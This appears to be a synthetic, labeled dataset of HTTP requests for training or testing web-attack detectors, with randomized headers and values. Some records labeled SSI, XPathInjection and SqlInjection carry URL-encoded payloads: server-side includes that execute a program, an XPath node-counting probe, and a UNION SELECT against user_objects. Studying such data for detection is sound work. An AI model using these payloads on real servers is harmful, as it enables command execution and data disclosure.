Authorization: aawcQh naes=aoet
Range: -81622,-19018,7300-85
Referer: http://efhn.biz/fdena1e/adgizhh4.gif
TE: deflate;q=0.2,trailers
Trailer: Upgrade
User-Agent: eagceobs/9.9.0.4
UA-CPU: PowerPC
UA-Disp: 9080,142,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 187x310
Via: 6.8 www.4nanre.png, FTP/9.8 103.108.36.90:9, lcmoeu/6.5 www.aogon.html
Transfer-Encoding: deflate
Upgrade: aee/7.4, ftmna0/7.5, t4rev/9.4, rrsrls/1.2
Warning: 484 www.eLtie.htm "tidEledu" "Wed, 13 Apr 05 16:42:38 UTC"
X-Forwarded-For: 111.155.43.186
X-Serial-Number: 94649830551806
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

etTeLv4vSeo9e=ni&3IH6Xzwindow.opentYwinnt=Hhtaccest&fbxut=048395&ht2= ug&ho3ape=319896&wxi2zmtee=74nGdh&abTWservicesViS2xtermUa=9ko&ntnoK=ocsh3aolsmde&rj=mtr&o1eee=tsuvoexec&vOang=Ni i&isGotdEa=e)cu&ts4zrAtyuetu1ih=ibdxOO&xotsguuaoe=DbeoehawkUeTjt

End - Id: 4518
Start - Id: 40292
class: SSI
GET /oUpCcV50_--J/eIMw7ZpezGxloBFnKkO4/tSO80/neu3N4om/eHeHjnTSMOit.jpeg?jotoaneetreams=281&7liihUsnugt1=4xHvedr%25utt&endbhqyweylnjgi=588269&bbF4=d5ntne+xsipeS&YbGHJ_Y=Tetnt&8se1ntu=%3C%21--+++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5C7bst%5CEr9%5Cutst.exe++d%3A%5Cstfv%5Cwww.naenatelti.org%5CYenrdit%5Cdatabase.mdb+%2Fx+++++exporttofoxpro%22--%3E&oe=409&C9Icatsh=00807401 HTTP/1.1
Host: 211.160.115.233
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, gzip;q=0.2, compress;q=0.1
Accept-Language: 3cffee2N-e0rt;q=0.7
Cache-Control: only-if-cached
Client-ip: 10.192.46.139
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="416"
Date: Fri, 11 Nov 05 07:25:02 GMT
ETag: W/"cZahXkYy1L59OAb"
Expect: ltnpse
From: sinl@n3biht.ch
If-Modified-Since: Sun, 06 Nov 05 12:31:26 GMT
If-Unmodified-Since: Fri, 06 Jul 07 11:48:26 UTC
If-Match: "ChbBg84reec1gBQ5Htl"
If-None-Match: "5BC@s8Xh_xvT25ly"
If-Range: "PHyY9dc1tgh1y@K"
Max-Forwards: 46
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Digest uri=/enaal4i/2shfn/bVreRy/hizeee/hehahtqL.tar.gz
Range: 37574-,839789-
Referer: http://etrmoni.net/dsdte/og7eww/eueer.jsp
TE: trailers
Trailer: Connection
User-Agent: gmeUUinto (nJOpJN2EWh; xsuzvqA; sbEw7b; rCgncREV)
UA-CPU: MIPS
UA-Disp: 2515,7751,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2184x777
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: compress
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 62707296438769057176
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40292
Start - Id: 49350
class: XPathInjection
GET /eRiNRcriOm8Eralscch/0T1erbseszaue/KMdql.OWAGiPPJl/4eTlMjoae/ntmttdoihtle9eo/anzvPQqh6@Ld/kenodnsrmp.tiff?en15Oe=alfiRxncnspnij&lRynet=h3+&nnr9ilcqu=O5%25i&Mtdn4oj0qbOde=xy0amGV31&huecrcinihs=%28i+++++%3C++count%28ectl%2Fchild%3A%3Atext%28%29%29+++++and++j+%3C++++count%28ncttgr%2Fchild%3A%3Acomment%28%29%29+and++++k+++%3C+++count%28Hn%2Fchild%3A%3A*%29++%29 HTTP/1.1
Host: www.pLHldavmw0.uk
Connection: eFadDRa
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, gzip, deflate;q=0.9
Accept-Language: a1neo-icbi, o1-miat1ie
Cache-Control: no-transform
Client-ip: 144.73.134.163
Cookie: osedsihricDh3r=aooene&nr;etrengotaderhsi=rceVmEJO;SetiTierrgh=Di2d7i3Mnpa
Cookie2: $Version="08"
Date: Fri, 12 May 06 03:13:13 CET
ETag: "VgXzljIoer326IDB1Rm"
Expect: nteo1rm=hlxEErme
From: EgerC@tafwi.com
If-Modified-Since: Tue, 24 Oct 06 20:10:21 UTC
If-Unmodified-Since: Wed, 02 Aug 06 05:30:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.9
Pragma: aI=tHeysf
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Digest qop=auth
Range: 50519-,-46393
Referer: /cedcsTgs/cni6jdS/tertle2l.swf
TE: deflate;q=0.4,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 3.6; er-Sw; rv:5.8.9) Gecko/58998223
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x2070
Via: gea/8.9 www.ne5nnEtd.htm, 3.2 www.intn.gif, 9.5 www.h2oe.tiff
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49350
Start - Id: 30766
class: Valid
GET /1.lE9/uSkylsa6srnrploEX0a.js? HTTP/1.0
Host: www.memhnpEn.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: ti-Vx, iommos-wallc2p, a4c7o9-Dn;q=0.5, wuea-tcraeuha, dR6r-r0;q=0.8
Cache-Control: no-cache
Client-ip: 94.33.75.27
Cookie: ratpfya6gg=aCntoim<oe70bzaqfe;eoHe1mchpS=7914;ojtfzq1s=3619031277;iroaterGlcSD=evari&tAuoexecc
Cookie2: $Version="8"
Date: Fri, 17 Feb 06 14:42:28 GMT
ETag: "kCIPstooR2FZMlPLQ"
Expect: dhOtrocf=8trheo;f7rimsn
From: dzpsof6@gehphe0eb.biz
If-Modified-Since: Thu, 10 Sep 09 11:38:53 GMT
If-Unmodified-Since: Mon, 09 Jan 06 24:23:23 UTC
If-Match: *
If-None-Match: "4Ngv3vpacdnDbDljZlm"
If-Range: "EZDHpA9FjYuNb3GGH"
Max-Forwards: 2976
MIME-Version: 2.5
Pragma: tltcs=cl
Proxy-Authorization: ieatc4 rnrbw=hcadA
Authorization: Digest nonce
Range: 145-,977-10
Referer: http://www.seoboo.gov/imoTnh/N2Oaa/ktEyoep.php3
TE: trailers
Trailer: TE
User-Agent: dTaver
UA-CPU: 68000
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: 3.6 www.axoa.jpeg, 1.6 95.41.255.219, 3.8 212.174.189.77
Transfer-Encoding: weNi
Upgrade: cuy/5.8, hrhe/5.4, pyae/0.7, qnece/8.2
Warning: 517 69.199.67.61 "1tb6ls4" "Fri, 04 Mar 05 12:25:07 UTC"
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 93006994743675
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30766
Start - Id: 6899
class: Valid
PUT /hazdniscsrf/uj6oaueHetdanlwoncr4/aqePMBna/Esatd/xrewSqil9fEee/tM9nMkMcwVHIx_4X7/dWxEZjx/hw7din8ogeon/pt/kH2uqmailbgsound.tiff? HTTP/1.1
Content-Length: 122
Content-Language: re8a9,eOelol
Content-Encoding: gzip
Content-Location: http://ardsree.ch/Catmtnu/Nerhca/e5reoli/Ey6aro/Xeeiti12.gif
Content-MD5: Yk9zc050ZWkyYWJtcnNSTA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 May 05 15:03:46 GMT
Last-Modified: Wed, 09 Jul 08 24:22:41 UTC
Host: www.eicjdttda.fr
Connection: eQaah
Accept: application/postscript;q=0.4
Accept-Charset: cp-932;q=0.9, euc-jp;q=0.8, iso-8859-5;q=0.2, shift_jis
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=61
Client-ip: 186.90.60.129
Cookie: Cn=7;elLhhooSIesfeT=rri/@Ghrtbeeogrubsuh
Cookie2: $Version="809"
Date: Sun, 06 Dec 09 11:38:32 UTC
ETag: W/"U9CMk.nN5QWdPt_"
Expect: oroaKar=mEieN
From: heaiiaa@e0fsn.com
If-Modified-Since: Thu, 01 Mar 07 15:57:55 GMT
If-Unmodified-Since: Fri, 02 Jul 04 01:22:06 UTC
If-Match: "cfrovr8isy1aFnK8OR7"
If-None-Match: "t_odzMJlEsc0u-aJD@x"
If-Range: *
Max-Forwards: 819
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic dGd2WnZvMDpydGVy
Authorization: 5lphu qaaamex=3IRdden8
Range: 326-
Referer: http://ltdh.ch/lcorw/p6q9sa/Ledthi.jsp
TE: chunked;q=0.6,chunked,trailers
Trailer: If-Modified-Since
User-Agent: gdnnGp45 http://www.d7Ihd.biz
UA-CPU: PowerPC
UA-Disp: 6111,6409,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 496x5279
Via: HTTP/7.6 www.hertijmo.jpeg
Transfer-Encoding: deflate
Upgrade: tjeto/0.4, 3ft/7.1
Warning: 788 www.HqrA8.jpeg "ttut7i" 
X-Forwarded-For: 230.81.180.144
X-Serial-Number: 65434343667649
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

VvaiuNiee1raoo=810&IoMDapt6uiH=Nhxb9Ad&lttleigT0=611&tfe=?enhs6t&ueahntr=fcgxt8isomuob&h6iyy1o=eNA262On0S&kielu5p=557906

End - Id: 6899
Start - Id: 16224
class: Valid
GET /_optmEWinserttmplKHV@W.bin?7dsy6t6=%24pconnectl&rqGeeesnihjaS5O=uftqle%25winnttdsrhasacceptDtd&qs=eTebNpaEesoa8&0igtdenaMet=295&ifhsnh8mnrwm=158927&ifsn=jL4edsiaqtiunendt&tta=ocPelnrTsaa8esTpz7N&5sio=htpasssb&tbstengc4n=Ringv7po&Xsugr=adropemnorNI%29egncein HTTP/1.0
Host: 250.61.87.120
Connection: keep-alive
Accept: image/png;q=0.5, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: m-eehLhait
Cache-Control: max-age=4777
Client-ip: 62.125.4.9
Cookie: odnFu=eElink
Cookie2: $Version="1"
Date: Tue, 31 Aug 04 03:45:28 GMT
ETag: W/"YVDW8cf65gcaYqNOx"
Expect: 100-continue
From: l8reS@iteois.org
If-Modified-Since: Mon, 03 May 04 15:38:00 GMT
If-Unmodified-Since: Thu, 16 Dec 04 03:11:41 GMT
If-Match: *
If-None-Match: "hi2zmvxdc0YCHtYZ"
If-Range: Fri, 16 Oct 09 20:40:35 CET
Max-Forwards: 6
MIME-Version: 7.6
Pragma: inm6fhnu='oaj'
Proxy-Authorization: Digest cnonce="enu3Fe"
Authorization: oiEe 5beif=9eesui
Range: -1,640-,-33570
Referer: /Aag0b.php4
TE: chunked
Trailer: Max-Forwards
User-Agent: wvRJb-1 http://www.ihls.org
UA-CPU: 68000
UA-Disp: 202,714,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7316x082
Via: 7.3 128.56.14.74
Transfer-Encoding: gzip
Upgrade: eueb/4.4, fL8t/8.5, 0ts/8.5, 9thZz/8.8
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 57.123.138.159
X-Serial-Number: 1816915028
----: -----------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 16224
Start - Id: 23882
class: Valid
GET /uP.yQ_143l.P03eCc/4telnetzOlqgtgAy/tGK/toqQLTyuJa/n1I.js?dkenv0tAae=rBP5f4emd&ejaeeeezYine=dl+eet&ewypsooNeRwora=nht+N3G%5Bscriptt&toeqnpgHUOsRbn=toa%263rem%5Dunionoti7s0&zsb=2 HTTP/1.0
Host: 139.129.22.64
Connection: lnhtil
Accept: image/*;q=0.9, video/quicktime
Accept-Charset: windows-1250;q=0.9, x-mac-roman, utf-8
Accept-Encoding: *;q=0.6
Accept-Language: 6h1iqg-a;q=0.3
Cache-Control: only-if-cached
Client-ip: 235.1.77.115
Cookie: mCkcdhsohweus7e=hetenouk
Cookie2: $Version="868"
Date: Wed, 07 Nov 07 20:17:51 CET
ETag: "NA39_MiEzIy7aaTXh"
Expect: sdtEergt=oanjweh;nanOpeat
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Thu, 04 Jun 09 15:26:10 GMT
If-Unmodified-Since: Sun, 21 Dec 08 14:54:06 CET
If-Match: "d4J44Z3gJUpodZ_zgb4"
If-None-Match: *
If-Range: Tue, 08 Mar 05 15:51:03 GMT
Max-Forwards: 9344
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM TXp0Y3g1bXRuYWJOMmFGdDJNczlnZmE1ZGlsbWEybkFp
Authorization: Digest username="8tmsi"
Range: 03-350626
Referer: /ei7lf.asmx
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: zsebh (njrp3K; awd.Erp; 6GGUL4VfG; swnE8elCv; s3hiDBAHR)
UA-CPU: 68000
UA-Disp: 734,1255,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 470x399
Via: HTTP/6.9 110.90.205.17:490
Transfer-Encoding: compress
Upgrade: ulgz9r/5.4, a8ll/8.6, KSaees/8.7
Warning: 894 62.142.154.235 "hato8acohtnui5TeemS" "Sun, 06 Feb 05 14:56:14 CET"
X-Forwarded-For: 87.73.118.107
X-Serial-Number: 32892404874
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23882
Start - Id: 25888
class: Valid
GET /t5rh0wcC/9XWlg/t5ph/x0fgsae/8e/tF4DBpmct/p29XvBhkD_fB4FkfRH/nn3anwedeiTdghGvlX.cgi?eiawrtdd=ddaitgwhAtc77tm&eEvoem6a=6eFo HTTP/1.0
Host: www.Beogapu5ma.ch
Connection: close
Accept: image/jpeg;q=0.0, application/zip;q=0.2, image/jpeg
Accept-Charset: iso-8859-3;q=0.9, iso-8859-6;q=0.9, x-mac-arabic
Accept-Encoding: gzip
Accept-Language: soeajnnn-e, atofn8R-eur;q=0.6, r-edi5trbE;q=0.9, p-pees, brhst-tif
Cache-Control: only-if-cached
Client-ip: 159.79.247.41
Cookie: 7Gxtermw7_Mp1u=weD3dni;ridtE=zrk@-mj(kj l oboot.inio1e
Cookie2: $Version="9"
Date: Thu, 24 Mar 05 18:53:11 UTC
ETag: "vR8.NXHUj6UMQh-b"
Expect: 100-continue
From: w2itnteS@3denboi.org
If-Modified-Since: Wed, 22 Apr 09 11:20:13 UTC
If-Unmodified-Since: Wed, 22 Nov 06 14:50:53 CET
If-Match: "U8uwZcdPGMe8rm7r-bmm"
If-None-Match: *
If-Range: Fri, 23 Jun 06 12:55:27 GMT
Max-Forwards: 2406
MIME-Version: 4.7
Pragma: zs='1M3ivwlP'
Proxy-Authorization: mUhk fhragt=loToa
Authorization: NTLM c25taWVuSDg3ZWh0T21qdHVzaGVwb0VmdGtpZWVjZXV0ZWZHbzF0ODB6NG50
Range: 112-242,-6,0-
Referer: http://www.tnNnmdo.gov/hvecnlKe/3Aac9tyz/ijmlwE/trbnartx/bsdhPutd.txt
TE: trailers
Trailer: Accept-Language
User-Agent: daeg (oKZp_h; rpZJKnJ4; eb@JBxF4-N; rALljCY.dz)
UA-CPU: MIPS
UA-Disp: 291,6267,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 000x1476
Via: 9.8 143.152.171.150
Transfer-Encoding: deflate
Upgrade: oDeoh/9.2
Warning: 227 139.25.180.193 "HcrHF3o7pmseiIess" "Sat, 08 Oct 05 05:44:23 CET"
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25888
Start - Id: 4938
class: Valid
PUT /jWunionGPF/e3P/roiht/ehNqQwujAY/a2/s9KFf9nMYWnjua/hereesvxmon/gh@b.asmx? HTTP/1.1
Content-Length: 134
Content-Language: w,ameop
Content-Encoding: deflate
Content-Location: /ei4ed.tiff
Content-MD5: ZWF0a3RlM29yb3J0TXluaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Mar 06 10:39:54 UTC
Last-Modified: Mon, 28 May 07 09:01:49 CET
Host: www.8moaweo.fr:80
Connection: close
Accept: image/jpeg, application/*
Accept-Charset: windows-1251;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 219.116.42.76
Cookie: du3exgwrsnl=hr=>k4r9;o6=21254797;8EROphpPPk=79129643
Cookie2: $Version="0"
Date: Fri, 13 Jun 08 06:16:29 GMT
ETag: W/"R-ijzqwPmH7289LYgyR"
Expect: 100-continue
From: tsamc1M@it8Et.ch
If-Modified-Since: Sat, 11 Dec 04 01:37:35 CET
If-Unmodified-Since: Fri, 07 Sep 07 07:50:05 UTC
If-Match: "6pGQDiz4f1kAO2ng"
If-None-Match: "LTQCkiQ1EAlWG_Z4"
If-Range: Wed, 02 May 07 22:07:46 UTC
Max-Forwards: 3673
MIME-Version: 2.7
Pragma: pebsdthr=r
Proxy-Authorization: NTLM bmFmcmV0dHR6MWdBdHB0MXVyaWVpajhrZUVpdXQ1ZWNhZGsydQ==
Authorization: Basic aERlYW46b2VhZXlSZUE=
Range: -315573,870-
Referer: http://www.RrwsT.com/itsdUj/Abstac/ogrOe6e/einnt.wmn
TE: chunked,chunked;q=0.8
Trailer: Expect
User-Agent: uhmGsxnFt (tQGVMub; cowebO)
UA-CPU: Sparc
UA-Disp: 979,352,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4223x6180
Via: FTP/3.6 222.90.57.159, oyal/5.2 www.eaCyr.js
Transfer-Encoding: compress
Upgrade: pb3/5.1, jrg4/3.7, Rdet3i/7.7
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 172.97.206.77
X-Serial-Number: 2881856065
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1tgwhhetemeawM1=1&ehishyetcho=nt-&.-z5VO1node=sedoeDetcnfiA&X4xsRp-xml= &Ce6pae2syor=e sluesi&83iaNzwhy=gag1smwC&isJa3ase=0156&nn=eekg

End - Id: 4938
Start - Id: 7198
class: Valid
PUT /is/I4ec8/bBADmTn/y./n54sea.tiff? HTTP/1.1
Content-Length: 165
Content-Language: st9dtol,4F,t3al0u4
Content-Encoding: identity
Content-Location: /jtauf/idim5nos/iwMuE.jpeg
Content-MD5: d3RlZG91YTJlb25sbHBhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Jul 07 01:49:01 CET
Last-Modified: Thu, 17 May 07 21:33:54 GMT
Host: 237.202.214.169
Connection: josr
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9
Accept-Language: ndss-miasbyye
Cache-Control: no-transform
Client-ip: 227.53.30.9
Cookie: cSR.8pt=ttow;AsPBxUQ=otseoNgpm
Cookie2: $Version="534"
Date: Sun, 14 Mar 04 18:28:24 CET
ETag: W/"rn6sybHKNVxYy6EGGhl"
Expect: 100-continue
From: rnaa5sa6@a60sretsto.org
If-Modified-Since: Sat, 04 Mar 06 14:54:19 GMT
If-Unmodified-Since: Wed, 01 Mar 06 12:08:15 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Jan 09 21:28:02 UTC
Max-Forwards: 9
MIME-Version: 3.9
Pragma: nhoRhm7e=dinnsee
Proxy-Authorization: Digest nc=9f15Ac7e
Authorization: tdstnc daeosst0=eshteist
Range: 835-,-3,7-0
Referer: http://eothfhms.be/ambnmot/rtmBcwn/ue3k6aan/osoc78.wmn
TE: trailers
Trailer: TE
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 7.8; s4-id; rv:3.8.5) Gecko/61148387
UA-CPU: Sparc
UA-Disp: 337,1594,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7035x878
Via: 1.2 193.191.64.70:2, FTP/2.6 239.11.179.138
Transfer-Encoding: deflate
Upgrade: rfi/3.0, dIn/9.0, Hsdn/2.1
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 62.39.133.239
X-Serial-Number: 741957676224840602
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

eeiecRalEng1r=httpsopensx&eneCioaknR8Ne=095433&rtwn5nxIei4=4207930827&rw9=yDCCbms6TUS&eaieefpOe= w&co35e4AIgrnvqp=4597&utltoreumeo2na=7773&tae=1&sh7iO=6&x3ccpe=40775

End - Id: 7198
Start - Id: 29797
class: Valid
GET /Olw1reqeiNdloewomA/icemiohgDclcwos/m00K4pcv7biHzw3/Wvarp30Pnull8binpIpXCb/asytsFy6cdlSieyd.asp?2sav=iusrdtN HTTP/1.0
Host: 78.33.131.70
Connection: close
Accept: */*
Accept-Charset: x-mac-roman;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=3946
Client-ip: 0.99.235.120
Cookie: dsot=ooi;AfromJ_cvpositionO=ti
Cookie2: $Version="92"
Date: Mon, 16 Jul 07 14:36:23 CET
ETag: "hPpIiMmM7JTv93r0P"
Expect: b9eH0S
From: ouiean@taluth.it
If-Modified-Since: Tue, 29 Nov 05 01:22:35 UTC
If-Unmodified-Since: Tue, 21 Jun 05 08:40:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://4ehieexr.ch/nd0va/aeNco8s.php3
Authorization: xEwtsJ mIdm0=OSlYB1
Range: -192,85376-41938,2-
Referer: /8rena/qerk/uouds.jpg
TE: trailers,gzip;q=0.1,trailers
Trailer: Trailer
User-Agent: Mozilla/9.4 (Windows; U; Win98 0.2; tr-ei; rv:5.5.2) Gecko/64100541
UA-CPU: Sparc
UA-Disp: 793,154,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 028x162
Via: HTTP/7.7 www.3Ssaotfd.js, FTP/9.6 www.es8siwo.htm:8
Transfer-Encoding: l0tKd; ahtiops=tkdef7n
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 671 www.dhevPk.tiff "ytaet" "Wed, 23 Dec 09 23:58:59 CET"
X-Forwarded-For: 199.39.79.249
X-Serial-Number: 9258897383132
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 29797
Start - Id: 40287
class: SSI
GET /t3lTeao/um/o2zlphaywEPjk/4link/xscofOcre7nrtncght.sh?EZBOlocationJ7liketWo=%3C%21--++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Ccirs2qe%5Cotb1%5Cwasi.exe++d%3A%5Carecelqds%5Cwww.erni.org%5Cl81h0%5Cdatabase.mdb++++%2Fx+++exporttofoxpro%22--%3E&tSb=totreh%24nshutdownid%3Esa&coer7hPlmiao=23nr&YJGft3htacces-rV=4904 HTTP/1.1
Host: www.grrWlTgus.org:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 233.182.232.153
Cookie: sv=35947383;zeisensisir=yuace7mfhuct4dbst1;hgaisieEcqsl=1755;dtgtWCmt=jNdmgEvp;1er9=senaiacrr6tf;tfnrttthinrt=hsamenwfromaTbetweenOepyon 
Cookie2: $Version="08"
Date: Mon, 13 Jul 09 24:28:12 UTC
ETag: W/"ADBuQO9tIlPS2mf"
Expect: glFeoe
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Tue, 28 Dec 04 19:03:02 UTC
If-Match: "_@HsKmpnxKATySdtY"
If-None-Match: "HMbRdr-E9-kscoXdXZ4"
If-Range: *
Max-Forwards: 6252
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bzZlZ3Bvbm0xdHRoaWZHYWFjaWVtYTZsb2VxYm13d0R0OWVwb2ZpT2Ju
Authorization: Digest nonce
Range: 37574-,839789-
Referer: http://www.8egvdrmo.ch/woiT/othlL/iriecodr/xirea/x2rv.mpg
TE: chunked;q=0.9
Trailer: Via
User-Agent: bS9rierut/6.1.8.9.6
UA-CPU: MIPS
UA-Disp: 182,511,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2184x777
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: 9bitgr; atus=xavAdux
Upgrade: rdr/9.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 147.185.144.226
X-Serial-Number: 62707296438769057176
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40287
Start - Id: 41740
class: SqlInjection
GET /tRSONbP9URQ8.jpeg?eeauBesyo=tVOgzw0T&mcleLclnaOsiwp=%3B+++++exec++get_cust%28+%27x%27%27+union+++++select+object_name%2Cobject_type%2C%27%27x%27%27+++from++++user_objects++++where+%27%27gtrhsBl0%27%27%3D++%27%27++%27%29%3B HTTP/1.1
Host: www.nygnvpsar.uk
Connection: close
Accept: audio/*, text/xml, text/*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: eoraYoda-ep6di, igb-s9g, aets0eh-TnHwea;q=0.5, atm-ez, ht9mgwis-1srs
Cache-Control: only-if-cached
Client-ip: 136.31.14.94
Cookie: yanthse34dK7wi0=an4igm~2athttcuopt%u];0aEtihdepyf=j;getnAnhoeid1a=tYIf;HkRusrdNmBEF=mrtkHtha1nupan;wiaPeemOtrt=EtLft>;Eat8ilaenis=0426
Cookie2: $Version="45"
Date: Tue, 15 Jan 08 23:06:12 GMT
ETag: "3RzLyYlW.gVQq0ScRi"
Expect: 100-continue
From: jMelerog@d2JLz3sO.it
If-Modified-Since: Thu, 22 Oct 09 21:44:27 CET
If-Unmodified-Since: Thu, 15 Feb 07 05:30:17 UTC
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: "ZJic_jgrv1IkF97NLGM"
If-Range: Thu, 21 Jul 05 08:40:36 UTC
Max-Forwards: 9
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Digest opaque="ciu9uft"
Range: -9158,6593-962,-115779
Referer: http://www.eojnams2.biz/7rydvEi.mp3
TE: chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/2.8 (compatible; Konqueror/9.8; Win 9x; atZE; ksjtm7we5o; coftlpee)
UA-CPU: 68000
UA-Disp: 965,4025,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: 2.8 107.83.82.175, FTP/5.3 193.90.35.217:813
Transfer-Encoding: identity
Upgrade: OcN/3.5, 0iet/4.6, opaid/9.4, RiWniu/3.2, egwh/3.6
Warning: 934 www.l0upte9.css "k9tss" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41740
Start - Id: 29973
class: Valid
GET /tiQnoEoRhtete/b1d5dwleWbsju/atAisxlcydhs/dU_bhJJCD/eal3riAs/m9Txv-zSmQgT5/tlbl/7m/7ox5obicetsaiFt2aiU.aspx?RNGnKwRrK0q=aynoade&0ua4D4=5n.IRtT83G HTTP/1.0
Host: www.rtblai.net
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: oaRlsh-i0, mEn6-4Wacme;q=0.8
Cache-Control: LkNLdrha='5'
Client-ip: 26.168.29.0
Cookie: 6hrzNsjjrx2e=6iGctYZG-;dbsr=ei;mtSrh5dt=7te;ootestn=mscriptoptidocument;7abu=em4Y3z3pL
Cookie2: $Version="6"
Date: Wed, 28 Jun 06 24:31:33 UTC
ETag: W/"hu@1fke@0C9Ln8qFHkn"
Expect: eeenmd
From: nAen2Ew@Xo7tyav4o.biz
If-Modified-Since: Sun, 21 Jan 07 08:37:29 UTC
If-Unmodified-Since: Thu, 24 Jul 08 06:25:56 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Oct 09 09:02:24 UTC
Max-Forwards: 359
MIME-Version: 0.1
Pragma: petaevi='al'
Proxy-Authorization: atyh matlcbq=soaSa
